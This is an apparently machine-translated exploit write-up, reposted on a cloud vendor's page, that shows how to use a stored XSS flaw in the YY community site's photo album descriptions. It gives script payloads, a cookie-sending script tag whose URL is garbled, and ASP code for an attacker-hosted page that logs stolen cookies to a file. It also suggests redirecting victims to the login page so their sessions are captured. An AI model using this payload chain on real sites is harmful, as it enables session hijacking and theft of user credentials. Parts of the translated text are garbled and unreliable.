Attackers can exploit the XSS vulnerability in the yycommunity to obtain and store user cookies.

Source: Internet
Author: User

Author B0mbErM @ n

The vulnerability has been submitted to the official website a few days ago and has been fixed. For more information, see the figure below.

-
Introduction:
XSS is implemented through the album function of yycommunity [m.yy.com.
This method is used in many places to obtain and store valid cookies of visitors.
-
Verify XSS:
Log on to [m. yy. cm] and apply for a contract. After applying, you can have your own YY space.
Click Open album> upload photo> open photo after upload> edit description> insert XSS statement.
The most basic XSS Statement> <script> alert (/B0mbErM @ n/) </script>
After the verification is passed, a dialog box is displayed, prompting/B0mbErM @ n/. We can perform the next verification.


-
Deep verification XSS:
Edit the file to <script> alert (document. cookie) </script>.
In this pop-up window, the cookie value will display username, password, and other information.


-
Use XSS to store cookies:
Insert XSS statement <script> document. write (); </script>
Where the B0mberM@n.asp is a file, website is a Web site. we need to put the asp file into an accessible website. when you access the XSS page, the asp program is executed and the prompt box is not displayed, which is hidden.
-
B0mberM@n.asp program code:
<%
Msg = Request. ServerVariables ("QUERY_STRING ")
Testfile = Server. MapPath ("B0mberM@n.txt ")
Set fs = server. CreateObject ("scripting. filesystemobject ")
Set thisfile = fs. OpenTextFile (testfile, 8, True, 0)
Thisfile. Writeline ("" & msg &"")
Thisfile. close
Set fs = nothing
%>
Note: The b0mberm@n.txt file in the program directory will be stored in the recording msg.pdf.
-
Further expansion:
Of course, the user may not log on and then visit our XSS page, in order to make it login and then access, we can add an automatic jump page at the end of the B0mbErM@n.asp to the login page, the other party will subconsciously log on and open the page containing XSS statements again. then we get the visitor's cookie. (there are a lot of automatic jump code in ASP. Here we will not give an example here. You will see more, better, and more detailed code at Google)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.